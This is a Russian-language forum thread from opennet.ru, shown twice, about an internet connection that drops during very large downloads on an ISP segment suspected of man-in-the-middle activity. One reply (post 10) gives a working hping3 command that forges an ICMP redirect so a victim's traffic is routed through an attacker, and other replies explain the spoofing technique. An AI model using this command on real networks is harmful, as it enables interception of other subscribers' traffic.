forum.opennet.ru - "при попытке загрузить объем >100Gb теряется доступ в интернет" (10)

"при попытке загрузить объем >100Gb теряется доступ в интернет"

Форум Маршрутизаторы CISCO и др. оборудование. (Разное)
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[ Отслеживать ]

"при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
Сообщение от Васечкин (?), 21-Сен-18, 22:35
Добрый день дано: доступ в интернет через гадюшник с кульхацкерами, mitm и даже просто дураками-экспериментаторами с микротиками. проблема: при попытке загрузить большой объем >100Gb непринципиально, например, тем же apt-mirror или какой-нибудь android source, очевидно, происходит зависание этих самых микротиков у кульхацкеров. Иногда помогает перезагрузка моего роутера linksys(все текущие обновления и патчи стоят), чаще не помогает, но если вытащить провод и вставить через пять минут помогает безупречно. На кабель грешить не приходится, коннектор переобжат. Сетевики прова разводят руками на их оборудовании ограничений нет, но регистрируется много бэдов, предположительно, из-за атак типа fake source routing. На том же самом моем роутере поднял второй WAN на G4-живет без проблем, но он влетает в копеечку. вопрос: какие есть варианты решения проблемы, кроме поиска и наказания неадекватов? Что за проблема может такая быть у кульхацкеров, что решается только пятиминутным нарушением физического контакта с моей стороны? Может ли быть это ограничение на размер кэша/дампа?
Ответить \| Правка \| Cообщить модератору

Оглавление

при попытке загрузить объем >100Gb теряется доступ в интернет, ыы (?), 23:07 , 21-Сен-18, (1)

при попытке загрузить объем >100Gb теряется доступ в интернет, Шел тут (?), 16:47 , 22-Сен-18, (3)

при попытке загрузить объем >100Gb теряется доступ в интернет, Andrey (??), 20:39 , 22-Сен-18, (4)

при попытке загрузить объем >100Gb теряется доступ в интернет, Аноним (5), 21:41 , 22-Сен-18, (5)

при попытке загрузить объем >100Gb теряется доступ в интернет, ыы (?), 08:03 , 23-Сен-18, (6)

при попытке загрузить объем >100Gb теряется доступ в интернет, ыы (?), 08:13 , 23-Сен-18, (7)

при попытке загрузить объем >100Gb теряется доступ в интернет, Аноним (5), 11:38 , 23-Сен-18, (8)

при попытке загрузить объем >100Gb теряется доступ в интернет, ыы (?), 16:59 , 23-Сен-18, (9)

при попытке загрузить объем >100Gb теряется доступ в интернет, Аноним (5), 20:50 , 23-Сен-18, (10)

при попытке загрузить объем >100Gb теряется доступ в интернет, Полимер Пластикович (?), 11:51 , 25-Сен-18, (11)

Сообщения по теме [Сортировка по времени | RSS]

1. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от ыы (?), 21-Сен-18, 23:07

> регистрируется много бэдов,
> помогает перезагрузка моего роутера
горелый порт, пачкорд обжатый "специалистом",перебитый пачкорд,  криво настроенное устройство.
>предположительно, из-за
бреда

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от Шел тут (?), 22-Сен-18, 16:47

>>предположительно, из-за
> бреда
бред?!
как я обожаю таких "комментаторов":
1. горелый порт на чьей стороне: пользователя или провайдера? Почему пауза 5 минут лечит проблему -специально обученные электроны порт чинят?
2. пачкорд обжатый "специалистом" - бином Ньютона?! Спешите видеть -только сегодня, эксклюзив и только ыы может обжать кабель правильно. Секта аудиофилов и безкислородной меди атакуэ.
3. Не говоря уже о тезисе чем является "patch cord" и почему канал абонент-провайдер подключается не патч-кордом. Если оборудование провайдера находится физически не рядом, то он может называться как угодно, "абонентский канал", "разводка" и даже, в ряде случаев,"последней милей", но никак не патч-кордом.
4. Если кабель перебит, то сетевик провайдера в первую очередь заинтересован в его замене, а не будет ссылаться на бэды из-за дураков, изучающих kali, и уж точно проверит кабель. Изучайте OSI и поймёте уровневую разницу в ошибках.
5. Много "чайников" в России способны отконфигурировать linksys? Даже не беру в расчёт, указанный скачиваемый материал с офлайн-зеркалами linux, предполагающий некоторую компетенцию.

унтер-офицерская вдова какая-то.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

4. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от Andrey (??), 22-Сен-18, 20:39

>[оверквотинг удален]
> обновления и патчи стоят), чаще не помогает, но если вытащить провод
> и вставить через пять минут помогает безупречно. На кабель грешить не
> приходится, коннектор переобжат. Сетевики прова разводят руками на их оборудовании ограничений
> нет, но регистрируется много бэдов, предположительно, из-за атак типа fake source
> routing. На том же самом моем роутере поднял второй WAN на
> G4-живет без проблем, но он влетает в копеечку.
> вопрос: какие есть варианты решения проблемы, кроме поиска и наказания неадекватов? Что
> за проблема может такая быть у кульхацкеров, что решается только пятиминутным
> нарушением физического контакта с моей стороны? Может ли быть это ограничение
> на размер кэша/дампа?
Какая-то словесная каша. Непонятно что вкладывается в слова: "неадекваты", "кульхацкеры", "сетевеки провайдера". Это одни и те-же лица? Если разные, то как между вами и оператором могжет быть кто-то еще?
На linksys ошибки на сетевом интерфейсе регистрируются?
Если качать большой объем, но ограничить скорость или больщой объем маленьких файлов, канал падает?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от Аноним (5), 22-Сен-18, 21:41

> Какая-то словесная каша. Непонятно что вкладывается в слова: "неадекваты", "кульхацкеры",
> "сетевеки провайдера". Это одни и те-же лица?
Андрей, а что такое "сетевеки"? Это как глаза со шторками, только для сети?
>Если разные,
Что надо принять чтобы сотрудник провайдера стал кульхацкером?
>то как
> между вами и оператором могжет быть кто-то еще?
знание сотрудником провайдера термина source routing намекает, что врезаться в кабель абонента в данном сегменте не нужно - трафик и так пойдёт через кульхацкера потому что оборудование провайдера, очевидно, не поддерживает изоляцию абонентов любым из доступных способов. похоже сурсроутингом делают митм, дампят весь трафик и в какой-то момент дамп файл переполняется - во всяком случае в старых редакциях сорм это так происходило.
> На linksys ошибки на сетевом интерфейсе регистрируются?
> Если качать большой объем, но ограничить скорость или больщой объем маленьких файлов,
> канал падает?

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

6. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от ыы (?), 23-Сен-18, 08:03

> знание сотрудником провайдера термина source routing намекает,
Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой "fake source routing" ?
Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

7. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от ыы (?), 23-Сен-18, 08:13

>> знание сотрудником провайдера термина source routing намекает,
> Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой
> "fake source routing" ?
> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...
Правды ради, гугл о чем-то таком слышал аж 7  (СЕМЬ !!!) результатов в ответе на запрос
https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake...

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

8. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от Аноним (5), 23-Сен-18, 11:38

>>> знание сотрудником провайдера термина source routing намекает,
>> Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой
>> "fake source routing" ?
>> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...
> Правды ради, гугл о чем-то таком слышал аж 7  (СЕМЬ !!!)
> результатов в ответе на запрос
> https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake...
потому как атака очень старая и маргинальная зовется spoofing via source routing
https://laurasecurity.wordpress.com/2008/08/04/remote-ip-spo.../
суть: атакующий отправляет пакет компьютеру или роутеру жертвы с указанием использовать предпочитаемый путь где указывает себя в качестве гетвея при этом даже если жертва сделает traceroute она не увидит фактических изменений маршрутов, а трафик польется через атакующего. вобщем классический mitm на спуфинге. не лечится. ну то есть можно запретить source routing, но только в новых редакциях да и то не во всех ОС оно выключено по умолчанию.

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

9. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от ыы (?), 23-Сен-18, 16:59

>>>> знание сотрудником провайдера термина source routing намекает,
>>> Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой
>>> "fake source routing" ?
>>> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...
>> Правды ради, гугл о чем-то таком слышал аж 7  (СЕМЬ !!!)
>> результатов в ответе на запрос
>> https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake...
> потому как атака очень старая и маргинальная зовется spoofing via source routing
https://www.google.ru/search?ie=UTF-8&hl=ru&q="spoofing...
20 результатов в гугле.

> https://laurasecurity.wordpress.com/2008/08/04/remote-ip-spo.../
> суть: атакующий отправляет пакет компьютеру или роутеру жертвы с указанием использовать
> предпочитаемый путь где указывает себя в качестве гетвея при этом даже
> если жертва сделает traceroute она не увидит фактических изменений маршрутов, а
> трафик польется через атакующего. вобщем классический mitm на спуфинге. не лечится.
> ну то есть можно запретить source routing, но только в новых
> редакциях да и то не во всех ОС оно выключено по
> умолчанию.
а вы в курсе о каком пакете идет речь? в рамках какого протокола? и что надо совершить и какие ляпы надо сделать чтобы это хотя-бы теоретически сработало?

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

10. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от Аноним (5), 23-Сен-18, 20:50

> 20 результатов в гугле.
папу попросите отключить "родительский контроль"
> а вы в курсе о каком пакете идет речь? в рамках какого
> протокола?
читайте про icmp type 5 redirect, hping3, wireshark
>и что надо совершить и какие ляпы надо сделать
сетевику быть идиотом или не иметь управляемого оборудования
> чтобы это хотя-бы теоретически сработало?
ну вот сейчас проверил - работает:
hping3 <жертва> -C 5 -K 1 --icmp-gw <атакующий> -a <шлюз жертвы> --icmp-ipsrc <жертва> --icmp-ipdest <vk.xxx>

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

11. "при попытке загрузить объем >100Gb теряется доступ в интернет" +/–

Сообщение от Полимер Пластикович (?), 25-Сен-18, 11:51

> ну вот сейчас проверил - работает:
> hping3 <жертва> -C 5 -K 1 --icmp-gw <атакующий> -a <шлюз жертвы> --icmp-ipsrc
> <жертва> --icmp-ipdest <vk.xxx>
Кому ты отвечаешь? Скрипткидди же. Теперь пойдёт соседей по подсети мучать. :)
Нет бы сразу вот так http://www.enclaveforensics.com/resources/Source_Routing.pdf
Благо, ограничение в 9 хопов.

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
Сообщение от ыы (?), 21-Сен-18, 23:07
> регистрируется много бэдов, > помогает перезагрузка моего роутера горелый порт, пачкорд обжатый "специалистом",перебитый пачкорд, криво настроенное устройство. >предположительно, из-за бреда
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	3. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от Шел тут (?), 22-Сен-18, 16:47
	>>предположительно, из-за > бреда бред?! как я обожаю таких "комментаторов": 1. горелый порт на чьей стороне: пользователя или провайдера? Почему пауза 5 минут лечит проблему -специально обученные электроны порт чинят? 2. пачкорд обжатый "специалистом" - бином Ньютона?! Спешите видеть -только сегодня, эксклюзив и только ыы может обжать кабель правильно. Секта аудиофилов и безкислородной меди атакуэ. 3. Не говоря уже о тезисе чем является "patch cord" и почему канал абонент-провайдер подключается не патч-кордом. Если оборудование провайдера находится физически не рядом, то он может называться как угодно, "абонентский канал", "разводка" и даже, в ряде случаев,"последней милей", но никак не патч-кордом. 4. Если кабель перебит, то сетевик провайдера в первую очередь заинтересован в его замене, а не будет ссылаться на бэды из-за дураков, изучающих kali, и уж точно проверит кабель. Изучайте OSI и поймёте уровневую разницу в ошибках. 5. Много "чайников" в России способны отконфигурировать linksys? Даже не беру в расчёт, указанный скачиваемый материал с офлайн-зеркалами linux, предполагающий некоторую компетенцию. унтер-офицерская вдова какая-то.
	Ответить \| Правка \| ^ к родителю #1 \| Наверх \| Cообщить модератору

4. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
Сообщение от Andrey (??), 22-Сен-18, 20:39
>[оверквотинг удален] > обновления и патчи стоят), чаще не помогает, но если вытащить провод > и вставить через пять минут помогает безупречно. На кабель грешить не > приходится, коннектор переобжат. Сетевики прова разводят руками на их оборудовании ограничений > нет, но регистрируется много бэдов, предположительно, из-за атак типа fake source > routing. На том же самом моем роутере поднял второй WAN на > G4-живет без проблем, но он влетает в копеечку. > вопрос: какие есть варианты решения проблемы, кроме поиска и наказания неадекватов? Что > за проблема может такая быть у кульхацкеров, что решается только пятиминутным > нарушением физического контакта с моей стороны? Может ли быть это ограничение > на размер кэша/дампа? Какая-то словесная каша. Непонятно что вкладывается в слова: "неадекваты", "кульхацкеры", "сетевеки провайдера". Это одни и те-же лица? Если разные, то как между вами и оператором могжет быть кто-то еще? На linksys ошибки на сетевом интерфейсе регистрируются? Если качать большой объем, но ограничить скорость или больщой объем маленьких файлов, канал падает?
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	5. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от Аноним (5), 22-Сен-18, 21:41
	> Какая-то словесная каша. Непонятно что вкладывается в слова: "неадекваты", "кульхацкеры", > "сетевеки провайдера". Это одни и те-же лица? Андрей, а что такое "сетевеки"? Это как глаза со шторками, только для сети? >Если разные, Что надо принять чтобы сотрудник провайдера стал кульхацкером? >то как > между вами и оператором могжет быть кто-то еще? знание сотрудником провайдера термина source routing намекает, что врезаться в кабель абонента в данном сегменте не нужно - трафик и так пойдёт через кульхацкера потому что оборудование провайдера, очевидно, не поддерживает изоляцию абонентов любым из доступных способов. похоже сурсроутингом делают митм, дампят весь трафик и в какой-то момент дамп файл переполняется - во всяком случае в старых редакциях сорм это так происходило. > На linksys ошибки на сетевом интерфейсе регистрируются? > Если качать большой объем, но ограничить скорость или больщой объем маленьких файлов, > канал падает?
	Ответить \| Правка \| ^ к родителю #4 \| Наверх \| Cообщить модератору


	6. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от ыы (?), 23-Сен-18, 08:03
	> знание сотрудником провайдера термина source routing намекает, Вы не внимательно читаете. Расскажите пожалуйста что за тип атаки такой "fake source routing" ? Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...
	Ответить \| Правка \| ^ к родителю #5 \| Наверх \| Cообщить модератору


	7. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от ыы (?), 23-Сен-18, 08:13
	>> знание сотрудником провайдера термина source routing намекает, > Вы не внимательно читаете. Расскажите пожалуйста что за тип атаки такой > "fake source routing" ? > Гугл о таком не знает... На Вас вся надежда.. или на топикстартера... Правды ради, гугл о чем-то таком слышал аж 7 (СЕМЬ !!!) результатов в ответе на запрос https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake...
	Ответить \| Правка \| ^ к родителю #6 \| Наверх \| Cообщить модератору


	8. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от Аноним (5), 23-Сен-18, 11:38
	>>> знание сотрудником провайдера термина source routing намекает, >> Вы не внимательно читаете. Расскажите пожалуйста что за тип атаки такой >> "fake source routing" ? >> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера... > Правды ради, гугл о чем-то таком слышал аж 7 (СЕМЬ !!!) > результатов в ответе на запрос > https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake... потому как атака очень старая и маргинальная зовется spoofing via source routing https://laurasecurity.wordpress.com/2008/08/04/remote-ip-spo.../ суть: атакующий отправляет пакет компьютеру или роутеру жертвы с указанием использовать предпочитаемый путь где указывает себя в качестве гетвея при этом даже если жертва сделает traceroute она не увидит фактических изменений маршрутов, а трафик польется через атакующего. вобщем классический mitm на спуфинге. не лечится. ну то есть можно запретить source routing, но только в новых редакциях да и то не во всех ОС оно выключено по умолчанию.
	Ответить \| Правка \| ^ к родителю #7 \| Наверх \| Cообщить модератору


	9. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от ыы (?), 23-Сен-18, 16:59
	>>>> знание сотрудником провайдера термина source routing намекает, >>> Вы не внимательно читаете. Расскажите пожалуйста что за тип атаки такой >>> "fake source routing" ? >>> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера... >> Правды ради, гугл о чем-то таком слышал аж 7 (СЕМЬ !!!) >> результатов в ответе на запрос >> https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake... > потому как атака очень старая и маргинальная зовется spoofing via source routing https://www.google.ru/search?ie=UTF-8&hl=ru&q="spoofing... 20 результатов в гугле. > https://laurasecurity.wordpress.com/2008/08/04/remote-ip-spo.../ > суть: атакующий отправляет пакет компьютеру или роутеру жертвы с указанием использовать > предпочитаемый путь где указывает себя в качестве гетвея при этом даже > если жертва сделает traceroute она не увидит фактических изменений маршрутов, а > трафик польется через атакующего. вобщем классический mitm на спуфинге. не лечится. > ну то есть можно запретить source routing, но только в новых > редакциях да и то не во всех ОС оно выключено по > умолчанию. а вы в курсе о каком пакете идет речь? в рамках какого протокола? и что надо совершить и какие ляпы надо сделать чтобы это хотя-бы теоретически сработало?
	Ответить \| Правка \| ^ к родителю #8 \| Наверх \| Cообщить модератору


	10. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от Аноним (5), 23-Сен-18, 20:50
	> 20 результатов в гугле. папу попросите отключить "родительский контроль" > а вы в курсе о каком пакете идет речь? в рамках какого > протокола? читайте про icmp type 5 redirect, hping3, wireshark >и что надо совершить и какие ляпы надо сделать сетевику быть идиотом или не иметь управляемого оборудования > чтобы это хотя-бы теоретически сработало? ну вот сейчас проверил - работает: hping3 <жертва> -C 5 -K 1 --icmp-gw <атакующий> -a <шлюз жертвы> --icmp-ipsrc <жертва> --icmp-ipdest <vk.xxx>
	Ответить \| Правка \| ^ к родителю #9 \| Наверх \| Cообщить модератору


	11. "при попытке загрузить объем >100Gb теряется доступ в интернет"	+/–
	Сообщение от Полимер Пластикович (?), 25-Сен-18, 11:51
	> ну вот сейчас проверил - работает: > hping3 <жертва> -C 5 -K 1 --icmp-gw <атакующий> -a <шлюз жертвы> --icmp-ipsrc > <жертва> --icmp-ipdest <vk.xxx> Кому ты отвечаешь? Скрипткидди же. Теперь пойдёт соседей по подсети мучать. :) Нет бы сразу вот так http://www.enclaveforensics.com/resources/Source_Routing.pdf Благо, ограничение в 9 хопов.
	Ответить \| Правка \| ^ к родителю #10 \| Наверх \| Cообщить модератору